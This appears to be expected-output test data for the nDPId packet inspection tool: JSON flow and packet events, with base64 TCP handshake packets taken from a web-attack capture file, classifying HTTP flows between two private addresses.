-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347725355,"flow_last_seen":1499347725355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347725355,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":1,"flow_last_seen":1499347725355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347725355,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jaBAAD4GODCsEAABwKgKMutyAFBT4UZ3AAAAAKACchAL1gAAAgQFtAQCCAoBO8vXAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":2,"flow_last_seen":1499347725356,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347725356,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ63J14+58U+FGeKAScSAHIwAAAgQFtAQCCAoD5Z1MATvL1wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6322,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":3,"flow_last_seen":1499347725356,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347725356,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jaFAAD4GODesEAABwKgKMutyAFBT4UZ4dePufYAQAOWmKgAAAQEICgE7y9cD5Z1M"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6333,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347726623,"flow_last_seen":1499347726623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347726623,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60288,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6333,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":1,"flow_last_seen":1499347726623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347726623,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cctAAD4GVAWsEAABwKgKMuuAAFD+ZrzfAAAAAKACchDpnAAAAgQFtAQCCAoBO80UAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6334,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":2,"flow_last_seen":1499347726623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347726623,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ64DDQROl\/ma84KAScSBxJgAAAgQFtAQCCAoD5Z6JATvNFAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6335,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":3,"flow_last_seen":1499347726624,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347726624,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ccxAAD4GVAysEAABwKgKMuuAAFD+Zrzgw0ETpoAQAOUQLgAAAQEICgE7zRQD5Z6J"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6351,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347729211,"flow_last_seen":1499347729211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347729211,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6351,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":1,"flow_last_seen":1499347729211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347729211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NhFAAD4Gj7+sEAABwKgKMuuaAFCuIPmKAAAAAKACchD6lgAAAgQFtAQCCAoBO8+bAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":2,"flow_last_seen":1499347729211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347729211,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ65plKrngriD5i6AScSA3dQAAAgQFtAQCCAoD5aEQATvPmwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":3,"flow_last_seen":1499347729212,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347729212,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NhJAAD4Gj8asEAABwKgKMuuaAFCuIPmLZSq54YAQAOXWfAAAAQEICgE7z5sD5aEQ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347730501,"flow_last_seen":1499347730501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730501,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1499347730501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347730501,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83upAAD4G5uWsEAABwKgKMuuoAFBoeQ40AAAAAKACchAqRAAAAgQFtAQCCAoBO9DeAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6364,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":2,"flow_last_seen":1499347730501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347730501,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ66jFwizsaHkONaAScSCSPAAAAgQFtAQCCAoD5aJSATvQ3gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":3,"flow_last_seen":1499347730502,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347730502,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03utAAD4G5uysEAABwKgKMuuoAFBoeQ41xcIs7YAQAOUxRAAAAQEICgE70N4D5aJS"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347606078,"flow_last_seen":1499347611787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347606078,"flow_last_seen":1499347611787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347607344,"flow_last_seen":1499347612785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59002,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347607344,"flow_last_seen":1499347612785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347608596,"flow_last_seen":1499347613787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59016,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347608596,"flow_last_seen":1499347613787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59016,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347612465,"flow_last_seen":1499347617785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347612465,"flow_last_seen":1499347617785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347613718,"flow_last_seen":1499347618787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347613718,"flow_last_seen":1499347618787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499347547687,"flow_last_seen":1499347614979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232682,"flow_avg_l4_payload_len":738,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347731797,"flow_last_seen":1499347731797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347731797,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1499347731797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347731797,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84K9AAD4G5SCsEAABwKgKMuu2AFCGTjKNAAAAAKACchDmwwAAAgQFtAQCCAoBO9IiAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":2,"flow_last_seen":1499347731797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347731797,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ67ZFR3+Dhk4yjqAScSB7XAAAAgQFtAQCCAoD5aOWATvSIgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6377,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":3,"flow_last_seen":1499347731798,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347731798,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04LBAAD4G5SesEAABwKgKMuu2AFCGTjKORUd\/hIAQAOUaZAAAAQEICgE70iID5aOW"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347733083,"flow_last_seen":1499347733083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347733083,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":1,"flow_last_seen":1499347733083,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347733083,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/vJAAD4Gxt2sEAABwKgKMuvEAFCmnS2RAAAAAKACchDKIQAAAgQFtAQCCAoBO9NjAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":2,"flow_last_seen":1499347733083,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347733083,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ68TrnH4qpp0tkqAScSC4ewAAAgQFtAQCCAoD5aTYATvTYwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6389,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":3,"flow_last_seen":1499347733084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347733084,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/vNAAD4GxuSsEAABwKgKMuvEAFCmnS2S65x+K4AQAOVXgwAAAQEICgE702MD5aTY"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347734348,"flow_last_seen":1499347734348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347734348,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":1,"flow_last_seen":1499347734348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347734348,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gzpAAD4GQpasEAABwKgKMuvSAFDIKlelAAAAAKACchB9NgAAAgQFtAQCCAoBO9SfAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6397,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":2,"flow_last_seen":1499347734348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347734348,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ69JCAHRCyCpXpqAScSAd2QAAAgQFtAQCCAoD5aYUATvUnwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6398,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":3,"flow_last_seen":1499347734349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347734349,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gztAAD4GQp2sEAABwKgKMuvSAFDIKlemQgB0Q4AQAOW83wAAAQEICgE71KAD5aYU"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6409,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347735664,"flow_last_seen":1499347735664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347735664,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60384,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6409,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":1,"flow_last_seen":1499347735664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347735664,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QgpAAD4Gg8asEAABwKgKMuvgAFB2opfiAAAAAKACchCNKgAAAgQFtAQCCAoBO9XoAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6410,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":2,"flow_last_seen":1499347735664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347735664,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6+DN1JXXdqKX46AScSB\/GgAAAgQFtAQCCAoD5addATvV6AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":3,"flow_last_seen":1499347735665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347735665,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QgtAAD4Gg82sEAABwKgKMuvgAFB2opfjzdSV2IAQAOUeIQAAAQEICgE71ekD5add"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6430,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347738229,"flow_last_seen":1499347738229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347738229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6430,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":1,"flow_last_seen":1499347738229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347738229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bexAAD4GV+SsEAABwKgKMuv6AFCQibWGAAAAAKACchBTAwAAAgQFtAQCCAoBO9hqAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6431,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":2,"flow_last_seen":1499347738229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347738229,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6\/pIUQYXkIm1h6AScSBXtgAAAgQFtAQCCAoD5aneATvYagEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6432,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":3,"flow_last_seen":1499347738229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347738229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0be1AAD4GV+usEAABwKgKMuv6AFCQibWHSFEGGIAQAOX2vQAAAQEICgE72GoD5ane"} 